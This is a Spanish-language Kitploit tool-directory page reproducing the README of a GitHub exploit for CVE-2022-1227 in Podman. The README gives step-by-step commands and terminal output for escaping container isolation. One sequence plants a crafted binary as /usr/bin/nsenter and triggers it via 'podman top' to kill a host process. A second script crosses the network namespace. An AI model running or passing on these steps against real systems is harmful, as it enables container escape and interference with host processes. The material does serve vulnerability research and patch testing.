Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-1227_Exploit — Un script para explotar CVE-2022-1227 | Kitploit
Herramientas/GitHubGitHub/louisliunova/cve-2022-1227_exploit
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónRed TeamingEscape de Contenedores
GitHublouisliunova/cve-2022-1227_exploit

CVE-2022-1227_Exploit

Un script para explotar CVE-2022-1227

Ver Repositorio
14hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-1227_Exploit

Un script para explotar CVE-2022-1227.

Antecedentes

  • Se recomienda Ubuntu 20.10.
  • Podman <4.0.0; se recomienda 3.4.4.

TODO: agregar cuál es el principio de esta vulnerabilidad

Instalar podman

Siga las instrucciones del documento oficial: https://podman.io/getting-started/installation#installing-on-linux

Para Ubuntu 20.10, el comando de instalación debería ser:

root@kitploit:~
sudo apt-get install podman=3.4.4+ds1-1ubuntu1

Inicio Rápido

Exploit Simple

En esta sección probamos un PoC simple para romper el límite del espacio de nombres PID y kill a un proceso en el host.

Estos son los pasos:

  1. Ejecute un contenedor con el siguiente comando: podman run --userns=keep-id --rm -d ubuntu:latest sleep infinity

  2. Ejecute keep en ./exp/bin y obtenga el PID con el que se está ejecutando. Normalmente mostrará su PID en la terminal. Como el binario está configurado para dormir durante 600 segundos, tal vez deba ser rápido para completar los siguientes pasos.

    root@kitploit:~
    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./exp/bin/keep
    My process ID is: 7719
    Put this number to `PID` in the sendsig.c and compile!
    
  3. Edite el código fuente en ./exp/src/sendsig.c e ingrese el PID obtenido en el paso anterior en la variable pid.

    root@kitploit:~
    int pid = OLD_VAL;
    

    a

    root@kitploit:~
    int pid = 7719;
    
  4. Coloque el binario compilado en el podman interno: podman cp ./exp/bin/sendsig $container_name :/usr/bin/nsenter

Exploit completo

En esta sección, utilizamos sockets para realizar la comunicación de sockets entre procesos entre el cliente en el contenedor y el servidor en el host, lo que normalmente es imposible cuando el mecanismo de aislamiento está completo. Usamos esta vulnerabilidad para romper el aislamiento del espacio de nombres de red para realizar este exploit.

Primero, entre al directorio con cd ./exp;

Simplemente ejecutando ./exploit.sh, todo se hará automáticamente; si todo sale bien, el servidor mostrará:

root@kitploit:~
Hello from the container!

Significa que cruzamos el espacio de nombres de red y escapamos.

Descargar herramienta
  • Ejecute podman top para activar la vulnerabilidad con: podman top -l

  • Si todo sale bien, el proceso en ejecución keep será eliminado inmediatamente. Esto es inusual, porque normalmente los procesos dentro del contenedor no pueden enviar señales a los procesos en el host debido al aislamiento del espacio de nombres PID.

    root@kitploit:~
    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./keep
    My process ID is: 7719
    Killed